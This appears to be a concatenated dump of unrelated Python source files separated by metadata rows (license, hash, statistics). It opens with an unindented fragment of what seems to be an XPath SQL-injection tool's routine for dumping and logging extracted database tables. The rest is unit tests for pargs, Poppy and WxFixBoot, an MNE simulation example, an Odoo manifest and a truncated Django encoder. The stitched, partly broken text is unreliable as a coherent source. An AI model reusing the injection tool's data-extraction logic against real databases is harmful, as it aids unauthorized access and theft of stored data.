_flag = False
_dlist = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName, ColsList=_colsDumpList)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (_dlist)
self._logs += "%s\n" % (_dlist)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (dataCount)
try:
data_dumped = sqlite.SessionDumpShow(self._PathSession, _tblName, ColList)
except Exception as e:
_flag = True
_dlist = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=dataCount, Dbname=_dbName, TblName=_tblName, ColsList=_colsDumpList)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (_dlist)
self._logs += "%s\n" % (_dlist)
else:
if len(data_dumped) == int(dataCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
cursor = sqlite.ShowPrettySession(self._PathSession, _tblName, Cols=ColList)
_tabulate = compat_cursor(cursor)
sqlite.ShowPrettySession(self._PathSession, _tblName, flag=False,Cols=ColList)
print compat_color.fw + compat_color.sd + "%s" % (_tabulate)
self._logs += "%s\n" % (_tabulate)
else:
_init = len(data_dumped)
_total = int(dataCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for _col in data_dumped:
for _d in _col:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (_d)
_,_ = self.XpathDataDump(_init, _total, _retVal, Table=_tblName, Dbname=_dbName, Coltodump=_colsDumpList, flag=False)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
cursor = sqlite.ShowPrettySession(self._PathSession, _tblName, Cols=ColList)
_tabulate = compat_cursor(cursor)
sqlite.ShowPrettySession(self._PathSession, _tblName, flag=False,Cols=ColList)
print compat_color.fg + compat_color.sb + "%s" % (_tabulate)
self._logs += "%s\n" % (_tabulate)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = "" | gpl-3.0 | 6,825,923,647,074,689,000 | 42.634264 | 187 | 0.599463 | false |
gsauthof/utility | test/pargs.py | 1 | 15714 | #!/usr/bin/env python3
#
# pargs unittests
#
# 2017, Georg Sauthoff <[email protected]>
#
# SPDX-License-Identifier: GPL-3.0-or-later
import glob
import os
import pytest
import re
import shutil
import subprocess
import tempfile
src_dir = os.getenv('src_dir', os.getcwd()+'/..')
test_dir = src_dir + '/test/in'
pargs = os.getenv('pargs', './pargs')
snooze32 = os.getenv('snooze32', './snooze32')
snooze = os.getenv('snooze', './snooze')
busy_snooze = os.getenv('busy_snooze', './busy_snooze')
simple_env = dict(x for x in os.environ.items()
if '\n' not in x[1] and '\r' not in x[1])
def runs_inside_docker():
# since ptrace is now enabled at various places we don't
# need to check anymore ...
# .travis.yml (docker_flags)
# ci/travis/linux/before_install.sh (enable_ptrace())
return False
with open('/proc/1/cgroup') as f:
e = re.compile('[0-9]+:pids:/docker/')
for line in f:
if e.match(line):
return True
return False
skip_in_container = pytest.mark.skipif(runs_inside_docker(),
reason='non-docker environment required')
def root_proc_count():
p = subprocess.run(['pgrep', '-c', '-u', 'root'], stdout=subprocess.PIPE,
universal_newlines=True)
return int(p.stdout)
skip_if_isolated = pytest.mark.skipif(root_proc_count() == 0,
reason='non-docker environment required')
def test_noargs():
p = subprocess.run([pargs], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
assert not p.stdout
assert p.returncode == 2
assert len(p.stderr) > 10
assert 'Usage: ' in p.stderr
assert '-a ' in p.stderr
assert '-e ' in p.stderr
@pytest.mark.parametrize("hstr", ['-h', '--help'])
def test_help(hstr):
p = subprocess.run([pargs, hstr], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert not p.stderr
assert p.returncode == 0
assert len(p.stdout) > 10
assert 'Usage: ' in p.stdout
assert '-a ' in p.stdout
assert '-e ' in p.stdout
@pytest.mark.parametrize("ostr", ['-z', '--hel', '--helper', '--foo'])
def test_unk(ostr):
p = subprocess.run([pargs, ostr, '123'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert 'Unknown' in p.stderr
assert ostr in p.stderr
@pytest.mark.parametrize("ostr", ['-x', '-e'])
def test_cmdline_combi(ostr):
p = subprocess.run([pargs, '-l', ostr, '123'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert 'incompatible' in p.stderr
assert ostr in p.stderr
@pytest.mark.parametrize("opts", [[], ['-a'], ['--'], ['-a', '--'] ])
def test_argv(opts):
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs] + opts + [str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '''{0}: {1} 1 0
argv[0]: {1}
argv[1]: 1
argv[2]: 0
'''.format(c.pid, snooze)
c.wait()
def test_envp():
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs, '-e', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert ls[1].startswith('envp[0]: ')
assert ls[-1].startswith('envp[{}]: '.format(len(ls)-2))
assert re.search('\nenvp\[[0-9]+\]: PATH={}\n'.format(os.environ['PATH']), p.stdout)
c.wait()
@pytest.mark.parametrize("opts", [ ['-ea'], ['-a', '-e'] ])
def test_argv_envp(opts):
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs] + opts + [ str(c.pid)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert ls[1] == 'argv[0]: {}'.format(snooze)
assert ls[3] == 'argv[2]: 0'
assert ls[4] == ''
assert ls[5].startswith('envp[0]: ')
assert ls[-1].startswith('envp[{}]: '.format(len(ls) - 2 - 3 - 1))
assert re.search('\nenvp\[[0-9]+\]: PATH={}\n'.format(os.environ['PATH']), p.stdout)
c.wait()
def test_cmdline():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs, '-l', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '{} 1 0\n'.format(snooze)
c.wait()
@skip_in_container
def test_auxv():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
v = '\nAT_PAGESZ 0x{:016x} {} KiB\n'.format(os.sysconf('SC_PAGESIZE'),
int(os.sysconf('SC_PAGESIZE')/1024))
assert v in p.stdout
c.wait()
@skip_in_container
@pytest.mark.parametrize("opts", [ ['-eax'], ['-xea'], ['-a', '-x', '-e' ] ])
def test_eax(opts):
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs] + opts + [ str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert sum(not x for x in ls) == 2
assert '\nAT_PLATFORM ' in p.stdout
assert '\nargv[0]: ' in p.stdout
assert '\nenvp[0]: ' in p.stdout
assert p.stdout.find('\nargv[0]') < p.stdout.find('\nenvp[0]')
assert p.stdout.find('\nenvp[0]') < p.stdout.find('\nAT_PLATFORM ')
c.wait()
def test_multiple():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
d = subprocess.Popen([snooze, '1', '1'])
assert d.pid
p = subprocess.run([pargs, str(c.pid), str(d.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert len(ls) == 9
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert not ls[4]
assert ls[5] == '''{}: {} 1 1'''.format(d.pid, snooze)
assert ls[-1] == 'argv[2]: 1'
c.wait()
d.wait()
@skip_in_container
@pytest.mark.parametrize('width', ['', '32'])
def test_auxv32(width):
c = subprocess.Popen([snooze32, '1', '42'])
assert c.pid
p = subprocess.run([pargs + width, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 42'''.format(c.pid, snooze32)
assert sum(not x for x in ls) == 0
assert '\nAT_PLATFORM ' in p.stdout
v = '\nAT_UID 0x{0:016x} {0}\n'.format(os.getuid())
assert v in p.stdout
c.wait()
def test_no_such_pid():
c = subprocess.Popen([snooze, '0'])
assert c.pid
c.wait()
p = subprocess.run([pargs, str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '{}: '.format(c.pid)
assert p.stderr == 'No such file or directory\n'
@skip_if_isolated
@pytest.mark.parametrize("opts", [ [ '-e'], ['-x'] ])
def test_no_perm(opts):
q = subprocess.run(['pgrep', '-u', 'root', '^writeback$'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True,
check=True)
pid = int(q.stdout)
p = subprocess.run([pargs] + opts + [str(pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '{}: \n'.format(pid)
assert p.stderr == 'Permission denied\n'
@skip_in_container
def test_auxv_verbose():
c = subprocess.Popen([snooze, '1', '42'])
assert c.pid
p = subprocess.run([pargs, '-v', '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 42'''.format(c.pid, snooze)
v = '\nAT_EUID 0x{0:016x} {0} (Effective uid)\n'.format(os.geteuid())
assert v in p.stdout
c.wait()
def test_too_long():
p = subprocess.run([pargs, '123456789012345678901'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert p.stderr == 'PID is too long.\n'
def test_long_enough():
p = subprocess.run([pargs, '12345678901234567890'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '12345678901234567890: '
assert p.stderr == 'No such file or directory\n'
@skip_in_container
@pytest.mark.parametrize("opts", [ [], ['-s'] ])
def test_proc_mem(opts):
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x'] + opts + [str(c.pid)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 fo o'''.format(c.pid, busy_snooze)
l = [x for x in ls if x.startswith('AT_EXECFN')][0]
assert l.endswith(busy_snooze)
c.wait()
@skip_in_container
def test_proc_mem_rand():
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 fo o'''.format(c.pid, busy_snooze)
l = [x for x in ls if x.startswith('AT_RANDOM')][0]
assert re.match(
'AT_RANDOM 0x[0-9a-f]{16} [0-9a-f]{2}( [0-9a-f]{2}){15}', l)
c.wait()
@skip_in_container
def test_hwcap():
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
l = [x for x in ls if x.startswith('AT_HWCAP')][0]
assert re.match(
'AT_HWCAP 0x[0-9a-f]{16} [0-9a-z]+( \| [0-9a-z]+)*', l)
c.wait()
@pytest.fixture(scope='module', params=[snooze, snooze32])
def mk_core_file(request):
exe = request.param
with tempfile.TemporaryDirectory() as d:
c = subprocess.Popen([exe, '10', 'hello', 'world'], env=simple_env)
core = '{}/core'.format(d)
subprocess.check_output(['gcore', '-o', core, str(c.pid)])
c.terminate()
c.wait()
yield (exe, core + '.{}'.format(c.pid))
def d_core_file(core_xz):
with tempfile.TemporaryDirectory() as d:
shutil.copy(core_xz, d)
b = os.path.basename(core_xz)
subprocess.check_output(['xz', '-d', b], cwd=d)
b = b[:-3]
exe = './' + b[5:b.find('.', 5)]
core = d + '/' + b
yield (exe, core)
@pytest.fixture(scope='module', params=glob.glob(test_dir + '/core.*.xz'))
def decompress_core_file(request):
core_xz = request.param
yield from d_core_file(core_xz)
# to test a specific core file instance
#
#@pytest.fixture(scope='module')
#def decompress_xyz_core(request):
# core_xz = test_dir + '/xyz.core'
# yield from d_core_file(core_xz)
def check_core(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '''core '{0:}' of {1:}: {2:} 10 hello world
argv[0]: {2:}
argv[1]: 10
argv[2]: hello
argv[3]: world
'''.format(core_file, pid, exe)
@skip_in_container
def test_core(mk_core_file):
check_core(mk_core_file);
def test_stored_core(decompress_core_file):
check_core(decompress_core_file);
# to test a specific core file instance
#
#def test_store_core_xyz(decompress_xyz_core):
# exe, core_file = decompress_sectionless_core
# pid = core_file[core_file.rfind('.')+1:]
# p = subprocess.run([pargs, core_file], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE, universal_newlines=True)
# assert p.returncode == 1
# assert not p.stdout
# assert p.stderr == 'some error'
@skip_in_container
def test_core_envp(mk_core_file):
exe, core_file = mk_core_file
p = subprocess.run([pargs, '-e', core_file], stdout=subprocess.PIPE,
env=simple_env, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
for key, val in os.environ.items():
if 'PYTEST' in key:
continue
if '\n' in val or '\r' in val:
continue
assert ': {}={}\n'.format(key, val) in p.stdout
def get_page_size(core_file):
l = core_file.split('.')
if len(l) < 3:
return os.sysconf('SC_PAGESIZE')
else:
if l[2] == 'ppc64':
return 64*1024
else:
return 4*1024
def check_core_auxv(cmd, mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([cmd, '-x', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == "core '{0:}' of {1:}: {2:} 10 hello world".format(
core_file, pid, exe)
l = [x for x in ls if x.startswith('AT_PAGESZ') ][0]
page_size = get_page_size(core_file)
assert l == 'AT_PAGESZ 0x{:016x} {} KiB'.format(
page_size, int(page_size/1024))
l = [x for x in ls if x.startswith('AT_EXECFN')][0]
assert l[l.rfind(' ')+1:] == exe
@skip_in_container
def test_core_auxv(mk_core_file):
check_core_auxv(pargs, mk_core_file)
@pytest.mark.parametrize('width', ['', '32'])
def test_stored_core_auxv(width, decompress_core_file):
check_core_auxv(pargs + width, decompress_core_file)
def check_core_auxv_random(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, '-x', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
l = [x for x in ls if x.startswith('AT_RANDOM')][0]
assert re.match(
'AT_RANDOM 0x[0-9a-f]{16} [0-9a-f]{2}( [0-9a-f]{2}){15}', l)
@skip_in_container
def test_core_auxv_random(mk_core_file):
check_core_auxv_random(mk_core_file)
def test_stored_core_auxv_random(decompress_core_file):
check_core_auxv_random(decompress_core_file)
def check_core_all(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, '-aexv', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == "core '{0:}' of {1:}: {2:} 10 hello world".format(
core_file, pid, exe)
assert sum(not x for x in ls) == 2
assert '\nenvp[0]: ' in p.stdout
assert '\nenvp[1]: ' in p.stdout
assert ls[3] == 'argv[2]: hello'
l = [x for x in ls if x.startswith('AT_EGID')][0]
assert l.endswith('(Effective gid)')
@skip_in_container
def test_core_all(mk_core_file):
check_core_all(mk_core_file)
def test_stored_core_all(decompress_core_file):
check_core_all(decompress_core_file)
# XXX test: PPC big-endian core, add the core files
| gpl-3.0 | 3,478,138,980,019,795,000 | 32.292373 | 86 | 0.640003 | false |
stackforge/poppy | tests/unit/provider/akamai/test_mod_san_queue.py | 2 | 5168 | # Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
from oslo_config import cfg
from zake import fake_client
from poppy.provider.akamai.mod_san_queue import zookeeper_queue
from tests.unit import base
AKAMAI_OPTIONS = [
# queue backend configs
cfg.StrOpt(
'queue_backend_type',
help='SAN Cert Queueing backend'),
cfg.ListOpt('queue_backend_host', default=['localhost'],
help='default queue backend server hosts'),
cfg.IntOpt('queue_backend_port', default=2181, help='default'
' default queue backend server port (e.g: 2181)'),
cfg.StrOpt(
'mod_san_queue_path', default='/mod_san_queue', help='Zookeeper path '
'for mod_san_queue'),
]
AKAMAI_GROUP = 'drivers:provider:akamai'
class TestModSanQueue(base.TestCase):
def setUp(self):
super(TestModSanQueue, self).setUp()
self.cert_obj_json = {
"cert_type": "san",
"domain_name": "www.abc.com",
"flavor_id": "premium"
}
# Need this fake class bc zake's fake client
# does not take any host parameters
class fake_kz_client(fake_client.FakeClient):
def __init__(self, hosts):
super(self.__class__, self).__init__()
zookeeper_client_patcher = mock.patch(
'kazoo.client.KazooClient',
fake_kz_client
)
zookeeper_client_patcher.start()
self.addCleanup(zookeeper_client_patcher.stop)
self.conf = cfg.ConfigOpts()
self.zk_queue = zookeeper_queue.ZookeeperModSanQueue(self.conf)
def test_enqueue_mod_san_request(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 1)
self.assertTrue(
json.loads(self.zk_queue.mod_san_queue_backend.get().
decode('utf-8')) == self.cert_obj_json)
def test_dequeue_mod_san_request(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
res = self.zk_queue.dequeue_mod_san_request(False).decode('utf-8')
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 1)
self.assertTrue(json.loads(res) == self.cert_obj_json)
res = self.zk_queue.dequeue_mod_san_request().decode('utf-8')
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 0)
self.assertTrue(json.loads(res) == self.cert_obj_json)
def test_traverse_queue(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
res = self.zk_queue.traverse_queue()
self.assertTrue(len(res) == 1)
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == [self.cert_obj_json])
def test_traverse_queue_multiple_records(self):
# Get a list of records to enqueue
cert_obj_list = []
for i in range(10):
cert_obj = {
"cert_type": "san",
"domain_name": "www.abc%s.com" % str(i),
"flavor_id": "premium",
"validate_service": False
}
cert_obj_list.append(cert_obj)
for cert_obj in cert_obj_list:
self.zk_queue.enqueue_mod_san_request(
json.dumps(cert_obj).encode('utf-8'))
res = self.zk_queue.traverse_queue()
self.assertTrue(len(res) == 10)
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == cert_obj_list)
def test_put_queue_data(self):
res = self.zk_queue.put_queue_data([])
self.assertTrue(len(res) == 0)
cert_obj_list = []
for i in range(10):
cert_obj = {
"cert_type": "san",
"domain_name": "www.abc%s.com" % str(i),
"flavor_id": "premium"
}
cert_obj_list.append(cert_obj)
self.zk_queue.put_queue_data(
[json.dumps(o).encode('utf-8') for o in cert_obj_list])
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 10)
res = self.zk_queue.traverse_queue()
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == cert_obj_list)
# test put data to non-empty queue
# should replace all items added above
self.zk_queue.put_queue_data(
[json.dumps(o).encode('utf-8') for o in cert_obj_list])
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 10)
| apache-2.0 | -7,805,028,341,830,593,000 | 36.179856 | 78 | 0.601974 | false |
hamishmb/wxfixboot | Tests/Tools/DialogToolsTests.py | 1 | 3102 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# DialogTools tests for WxFixBoot Version 2.0.3
# This file is part of WxFixBoot.
# Copyright (C) 2013-2018 Hamish McIntyre-Bhatty
# WxFixBoot is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3 or,
# at your option, any later version.
#
# WxFixBoot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WxFixBoot. If not, see <http://www.gnu.org/licenses/>.
#Do future imports to prepare to support python 3. Use unicode strings rather than ASCII strings, as they fix potential problems.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
#Import modules
import unittest
import wx
import time
class TestPanel(wx.Panel):
def __init__(self, parent):
"""Initialises the panel"""
wx.Panel.__init__(self, parent=parent)
self.frame = parent
class TestWindow(wx.Frame):
def __init__(self):
"""Initialises TestWindow"""
wx.Frame.__init__(self, parent=None, title="WxFixBoot Tests", size=(1,1), style=wx.SIMPLE_BORDER)
#No need for assertions, we're just making sure the functions run without errors here.
class TestShowThreadDlgs(unittest.TestCase):
def setUp(self):
self.app = wx.App()
self.Frame = TestWindow()
self.Panel = TestPanel(self.Frame)
Tools.dialogtools.ParentWindow = self
def tearDown(self):
del Tools.dialogtools.ParentWindow
self.Panel.Destroy()
del self.Panel
self.Frame.Destroy()
del self.Frame
self.app.Destroy()
del self.app
def testMsgDlg(self):
DialogTools().ShowThreadMsgDlg("Test message from WxFixBoot")
def testYesNoDlg(self):
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click Yes")
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click No")
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click either button. If you can see this part of the message, custom buttons aren't supported on your system", buttons=("Yay", "Nay"))
def testChoiceDlg(self):
DialogTools().ShowThreadChoiceDlg("Test message from WxFixBoot. What do programmers convert into software? Select \"Pizza & Caffeine\"", choices=["Cheese & Milk", "Pizza & Caffeine", "Dry Bread & Water"])
DialogTools().ShowThreadChoiceDlg("Test message from WxFixBoot. Select \"Turtles\"", choices=["Turtles", "Tortoises", "Terrapins"])
def testTextEntryDlg(self):
DialogTools().ShowThreadTextEntryDlg("Test message from WxFixBoot. Type \"Linux\"")
def testSaveFileDlg(self):
DialogTools().ShowThreadSaveFiledlg("Test message from WxFixBoot. Enter a path and filename.")
| gpl-3.0 | 2,059,863,111,196,046,300 | 39.815789 | 212 | 0.706641 | false |
drammock/mne-python | examples/simulation/simulate_evoked_data.py | 6 | 2810 | """
==============================
Generate simulated evoked data
==============================
Use :func:`~mne.simulation.simulate_sparse_stc` to simulate evoked data.
"""
# Author: Daniel Strohmeier <[email protected]>
# Alexandre Gramfort <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
import matplotlib.pyplot as plt
import mne
from mne.datasets import sample
from mne.time_frequency import fit_iir_model_raw
from mne.viz import plot_sparse_source_estimates
from mne.simulation import simulate_sparse_stc, simulate_evoked
print(__doc__)
###############################################################################
# Load real data as templates:
data_path = sample.data_path()
raw = mne.io.read_raw_fif(data_path + '/MEG/sample/sample_audvis_raw.fif')
proj = mne.read_proj(data_path + '/MEG/sample/sample_audvis_ecg-proj.fif')
raw.info['projs'] += proj
raw.info['bads'] = ['MEG 2443', 'EEG 053'] # mark bad channels
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-no-filter-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-cov.fif'
fwd = mne.read_forward_solution(fwd_fname)
fwd = mne.pick_types_forward(fwd, meg=True, eeg=True, exclude=raw.info['bads'])
cov = mne.read_cov(cov_fname)
info = mne.io.read_info(ave_fname)
label_names = ['Aud-lh', 'Aud-rh']
labels = [mne.read_label(data_path + '/MEG/sample/labels/%s.label' % ln)
for ln in label_names]
###############################################################################
# Generate source time courses from 2 dipoles and the correspond evoked data
times = np.arange(300, dtype=np.float64) / raw.info['sfreq'] - 0.1
rng = np.random.RandomState(42)
def data_fun(times):
"""Function to generate random source time courses"""
return (50e-9 * np.sin(30. * times) *
np.exp(- (times - 0.15 + 0.05 * rng.randn(1)) ** 2 / 0.01))
stc = simulate_sparse_stc(fwd['src'], n_dipoles=2, times=times,
random_state=42, labels=labels, data_fun=data_fun)
###############################################################################
# Generate noisy evoked data
picks = mne.pick_types(raw.info, meg=True, exclude='bads')
iir_filter = fit_iir_model_raw(raw, order=5, picks=picks, tmin=60, tmax=180)[1]
nave = 100 # simulate average of 100 epochs
evoked = simulate_evoked(fwd, stc, info, cov, nave=nave, use_cps=True,
iir_filter=iir_filter)
###############################################################################
# Plot
plot_sparse_source_estimates(fwd['src'], stc, bgcolor=(1, 1, 1),
opacity=0.5, high_resolution=True)
plt.figure()
plt.psd(evoked.data[0])
evoked.plot(time_unit='s')
| bsd-3-clause | -2,156,848,165,290,073,300 | 35.025641 | 79 | 0.588256 | false |
loco-odoo/localizacion_co | openerp/addons-extra/l10n_co_account/__openerp__.py | 3 | 1860 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2015 I.A.S. INGENIERÍA, APLICACIONES Y SOFTWARE Johan Alejandro Olano (<http:http://www.ias.com.co).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Colombian Accounting Localization Basics by I.A.S. INGENIERÍA, APLICACIONES Y SOFTWARE",
"version": "1.0",
"description": """
Profile and basics to colombian accounting localization
Localización contable y tributaria básica para Colombia
""",
"author": "I.A.S. Ingenieria, Aplicaciones y Software",
"website": "http://www.ias.com.co",
"category": "Localisation/Profile",
"depends": [
"account_chart",
"account_payment",
"l10n_co_chart",
"l10n_co_vat",
"base_translate_tools",
"base_table",
],
"data":[
"account_data.xml",
"account_report.xml",
"invoice_view.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
'images': [],
}
| agpl-3.0 | -7,525,978,906,629,870,000 | 34.018868 | 119 | 0.596983 | false |
intelie/django-yajf | yajf/encoder.py | 1 | 2669 | # -*- coding: utf-8 -*-
import json
from django.utils.functional import Promise
from django.db.models.query import QuerySet
from django.utils.encoding import force_text
from django.utils import six, timezone
import datetime
from datetime import timedelta
import decimal
import uuid
